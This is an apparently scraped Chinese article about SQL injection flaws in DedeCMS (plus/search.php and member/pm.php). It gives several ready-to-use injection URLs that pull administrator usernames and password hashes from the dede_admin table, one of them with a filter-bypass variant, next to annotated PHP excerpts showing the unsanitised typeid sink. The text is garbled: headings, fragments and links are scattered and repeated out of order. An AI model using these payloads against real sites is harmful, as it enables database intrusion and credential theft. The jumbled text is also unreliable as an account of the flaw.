
注入漏洞利用EXP

来源:http://www.ccidsi.com 作者:集成介绍 人气:191 发布时间:2019-07-03
摘要:3. 漏洞影响范围 4. 漏洞代码分析 webshell.cc/plus/search.php?keyword=astypeArr[111=@`'`) and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select CONCAT(0x7c,userid,0x7c,pwd) from `dede_admin` limit 0,1),1,62

3. 漏洞影响范围
4. 漏洞代码分析


webshell.cc/plus/search.php?keyword=as&typeArr[111=@`'`) and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select CONCAT(0x7c,userid,0x7c,pwd) from `dede_admin` limit 0,1),1,62)))a from information_schema.tables group by a)b)#@`'` ]=a

 

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1' and char(@`'`) and 1=2 UniOn SelEct 1,2,3,4,5,6,7,8,9,10,11,12 #

如果结果提示

include/arc.searchview.class.php

catalog

Safe Alert: Request Error step 1 !

http://www.2cto.com/Article/201301/184105.html
http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′ and @' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

图 1

plus/search.php

0x1: POC1

如果结果提示

 

6. 攻防思考

 

plus/search.php

1. 漏洞描述  2. 漏洞触发条件  3. 漏洞影响范围  4. 漏洞代码分析  5. 防御方法  6. 攻防思考

Safe Alert: Request Error step 2 !

...
// PHP5-style constructor of the SearchView class (excerpt; the ".." markers are the article's elisions).
// NOTE(review): $typeid is stored on the object without any cast or validation here. The
// caller's is_numeric() check (see the plus/search.php excerpt on this page) presumably no
// longer holds once $typeid has been reassigned from a $typeArr key, so TypeID should be
// treated as untrusted until it is cast to int.
function __construct($typeid,$keyword,$orderby,$achanneltype="all", $searchtype='',$starttime=0,$upagesize=20,$kwtype=1,$mid=0)
{
    global $cfg_search_max,$cfg_search_maxrc,$cfg_search_time;
    // Fall back to a page size of 10 when the caller passed an empty value (0, '', null).
    if(empty($upagesize))
    {
        $upagesize = 10;
    }
    // Direct assignment, no sanitisation.
    $this->TypeID = $typeid;
    ..
}
..
http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′and char(@`’`) and 1=2 /*!50000Union*/ /*!50000select*/ 1,2,3,4,5,6,userid,8,9,10,11,pwd from `dede_admin`#

图 2

// The same SearchView constructor, showing the SQL sink (excerpt; ".." / "..." are the article's elisions).
function __construct($typeid,$keyword,$orderby,$achanneltype="all", $searchtype='',$starttime=0,$upagesize=20,$kwtype=1,$mid=0)
{
    ..
    $this->TypeID = $typeid;
    ...
    else
    {
        // $this->TypeID, which may contain attacker-supplied malformed characters, is
        // interpolated straight into the SQL query: it is unquoted and uncast, so a
        // non-numeric value changes the statement. Mitigation: cast it to int before use
        // (e.g. intval) or bind the value with a prepared statement.
        $row =$this->dsql->GetOne("SELECT channeltype FROM `dede_arctype` WHERE id={$this->TypeID}");
        $this->ChannelTypeid=$row['channeltype'];
    }
    ..
}
..
// member/pm.php, "read" branch of the $dopost dispatch (the preceding if/else-if branches
// are not shown on this page).
else if($dopost=='read')
{
    // Friend list of the current member. $cfg_ml->M_ID is interpolated into SQL here and
    // below — presumably it comes from the login session rather than the request; verify.
    $sql = "Select * From `dede_member_friends` where  mid='{$cfg_ml->M_ID}' And ftype!='-1'  order by addtime desc limit 20";
    $friends = array();
    $dsql->SetQuery($sql);
    $dsql->Execute();
    while ($row = $dsql->GetArray())
    {
        $friends[] = $row;
    }
    /* $id filtering */
    // NOTE(review): with this intval() cast, $id can only be an integer in the three queries
    // below; the id-parameter POCs on this page presumably target a build in which this cast
    // is absent — confirm against the exact DedeCMS version.
    $id = intval($id);
    /* */
    // Authorisation check: only a message the member sent or received can be read.
    $row = $dsql->GetOne("Select * From `dede_member_pms` where id='$id' And (fromid='{$cfg_ml->M_ID}' Or toid='{$cfg_ml->M_ID}')");
    if(!is_array($row))
    {
        ShowMsg('对不起,你指定的消息不存在或你没权限查看!','-1');
        exit();
    }
    // Mark as read. The inbox update is scoped to this $id; the outbox update is not.
    $dsql->ExecuteNoneQuery("Update `dede_member_pms` set hasview=1 where id='$id' And folder='inbox' And toid='{$cfg_ml->M_ID}'");
    $dsql->ExecuteNoneQuery("Update `dede_member_pms` set hasview=1 where folder='outbox' And toid='{$cfg_ml->M_ID}'");
    include_once(dirname(__FILE__).'/templets/pm-read.htm');
    exit();
}
webshell.cc/plus/search.php?keyword=as&typeArr[111=@`'`) UnIon seleCt 1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from `dede_admin`#@`'` ]=a
..
// plus/search.php: the request's $typeid is accepted only if numeric, otherwise reset to 0.
// NOTE(review): this check covers the request value only. The category-cache lookup excerpt
// on this page reassigns $typeid from a $typeArr key; if that runs between this check and
// the constructor call, the value handed to SearchView is not guaranteed numeric — confirm
// the statement order in the full file.
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
..
$sp = new SearchView($typeid,$keyword,$orderby,$channeltype,$searchtype,$starttime,$pagesize,$kwtype,$mid);
..

***Copyright (c) 2015 LittleHann All rights reserved***

 

// Look up the category (column) information (excerpt; "..." is the article's elision).
if(empty($typeid))
{
    ...
    // Load the category cache and check whether the keyword mentions a related category.
    require_once($typenameCacheFile);
    // An attacker who can overwrite $typeArr through the local-variable-override
    // vulnerability enters this branch with keys and values of their choosing.
    if(isset($typeArr) && is_array($typeArr))
    {
        // 1. Iterate over the global array $typeArr, taking each key/value pair.
        foreach($typeArr as $id => $typename)
        {
            /*
            2. Remove from the input $keyword parameter any value present in this global
               array ($typeArr); i.e. $typeArr is meant to act as a list of sensitive keywords.
            3. Note that str_replace() returns the replaced array or string.
            4. If a configured keyword (a value stored in $typeArr) is found in the supplied
               $keyword parameter, it is filtered out.
            */
            $keywordn = str_replace($typename, ' ', $keyword);
            if($keyword != $keywordn)
            {
                $keyword = $keywordn;
                // 5. During this filtering a second variable override happens: $typeid now
                //    takes the array *key* $id, which is carried "directly" into the later
                //    SQL query. Mitigation: cast the key (intval) before it can reach SQL,
                //    and ensure request parameters cannot populate $typeArr.
                $typeid = $id;
                break;
            }
        }
    }
}

**Relevant Link**

如果正常显示说明漏洞不存在

catalog

**Relevant Link**


0x2: POC2

0x3: POC3

那么直接用上面的exp


DedeCMS 会员中心注入漏洞

那么直接用上面的exp


